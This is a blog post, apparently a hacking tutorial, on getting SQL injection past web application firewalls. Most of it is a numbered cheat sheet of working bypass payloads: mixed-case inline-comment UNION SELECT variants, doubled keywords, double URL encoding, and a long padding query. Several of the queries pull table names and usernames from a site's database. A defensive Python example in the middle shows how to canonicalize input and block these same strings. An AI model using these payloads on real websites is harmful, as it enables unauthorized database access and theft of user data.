Sunday, May 28, 2017

WAF & WAF Bypassing



Let’s first explain what WAF stands for and what it actually does for a website / server.
WAF is short for Web Application Firewall; its purpose is to filter out many of the characters in our queries.

An example of an injection on a normal website would look like:
www.example.com/page.php?id=1 and 1=0 union all select 1,2,3,4,5--

If we do that on a WAF-protected website, we will get thrown out with a 403 Forbidden error or a 404 Not Found error.

Now that you know what a WAF is and what it does, I will show you some tips / tricks to bypass it.

Comments used to bypass:
· //
· -- 
· /**/
· #
· --+
· -- -
· ;
· -- a
Now for bypassing some WAFs: the exploitation is quite similar to basic SQL injection, but there are now filters that you have to bypass. Here are a few queries that CAN bypass them (it’s never 100%).
· page.php?id=1/*!UnIoN*/SeLeCT (In this case we use /*! ... */, as they are used as inline MySQL comments (sort of PHP-like), and we mix lower case and upper case letters to bypass the filter as well.)
· page.php?id=1+UNIunionON+SeLselectECT+1,2,3,4,5-- (In this case we use doubled text. It seems rather weird, but if a filter detects the union select and uses preg_replace (a PHP function) to replace our union select with a space (or nothing), the query will still show as UNION SELECT 1,2,3,4,5--)
· page.php?id=1%252f%252a*/UNION%252f%252a /SELECT (In this case we are using HTTP (URL) encoding, hence the %252f etc. signs, to DOUBLE bypass certain WAFs (this method works only on 10-15% of the sites I’ve personally tested on).)
Putting it all together:
www.example.com/page.php?id=1 /*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables--

This will result in all the table names being shown, just as in Chapter 1.
The rest of the exploitation you have to figure out yourself. I gave you the handles for WAF bypassing; a hacker has to do everything on their own to really master / learn something they want. All this does is tickle your brain.
More bypass tips & tricks:
1. id=1+(UnIoN)+(SelECT)+
2. id=1+(UnIoN+SeLeCT)+
3. id=1+(UnI)(oN)+(SeL)(EcT)
4. id=1+'UnI''On'+'SeL''ECT'
5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3--
6. id=1+UnIoN+SeLecT 1,2,3--
7. id=1+UnIOn/**/SeLect 1,2,3--
8. id=1+UNIunionON+SELselectECT 1,2,3--
9. id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3--
10. id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3--
11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2,3--
12. id=1+un/**/ion+sel/**/ect+1,2,3--
13. id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
14. id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
15. id=1+/**/union/*&id=*/select/*&id=*/1,2,3--

Only the start of the query needs to be written in these weird-looking forms; the rest of the query you can try as normal, like:
www.example.com/page.php?id=1 id=1+(UnIoN)+(SelECT)+1,2,username,4,5 from users--
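
Seen from the filter's side, the tricks above (inline comments with mixed case, doubled keywords against a stripping filter, double URL encoding) all exploit a rule that inspects the raw parameter. The following is an added example, not part of the original post: it contrasts a literal rule and a single-pass strip with canonicalize-then-reject, run over values quoted from this page. The function names, the five-round decode bound and both rules are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_plus

RAW_RULE = re.compile(r"union\s+select", re.I)   # literal blacklist rule on the raw value
CANON_RULE = re.compile(r"union.*select", re.S)  # substring match, deliberately no word boundaries

def naive_strip(value: str) -> str:
    """Single-pass keyword removal, like the preg_replace filter the page describes."""
    return re.sub(r"union|select", "", value, flags=re.I)

def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Reduce a parameter to roughly the text MySQL would end up parsing."""
    for _ in range(max_rounds):                # peel nested encoding: %252f -> %2f -> /
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*!\d*", " ", value)     # /*! ... */ bodies are executed, so keep them
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)  # plain comments only separate tokens
    value = value.replace("*/", " ")           # closers left behind by unwrapped /*! ... */
    return re.sub(r"\s+", " ", value).strip().lower()

def should_block(value: str) -> bool:
    """Match on the canonical form and reject; never rewrite the value and pass it on."""
    return CANON_RULE.search(canonicalize(value)) is not None

# Values of the id parameter quoted from this page, plus two constructed benign ids.
PAGE_SAMPLES = [
    "1/*!UnIoN*/SeLeCT",
    "1+UNIunionON+SeLselectECT+1,2,3,4,5--",
    "1%252f%252a*/UNION%252f%252a /SELECT",
    "1+UnIOn/**/SeLect 1,2,3--",
]
BENIGN = ["1", "42"]

if __name__ == "__main__":
    for v in PAGE_SAMPLES + BENIGN:
        print(f"raw_rule={bool(RAW_RULE.search(v))!s:5} block={should_block(v)!s:5} {v}")
    # The stripping filter itself reassembles the keywords it removed:
    print(naive_strip("1+UNIunionON+SeLselectECT+1,2,3,4,5--"))
```

For a numeric parameter such as id, an integer cast or a parameterized query removes the injection point itself, which no filter rule does.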

The unknown 500 server error bypass.
A lot of you might not know that 500 server errors fall under WAF bypassing. It’s simply a technique in which we use a certain amount of characters to bypass the filters.
Example:
index.php?id=-1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) /*!UNION*/ /*!SELECT*//**/1,2,3,4,5,6—x
· The query looks quite big; the A is repeated 1000x to bypass common filters.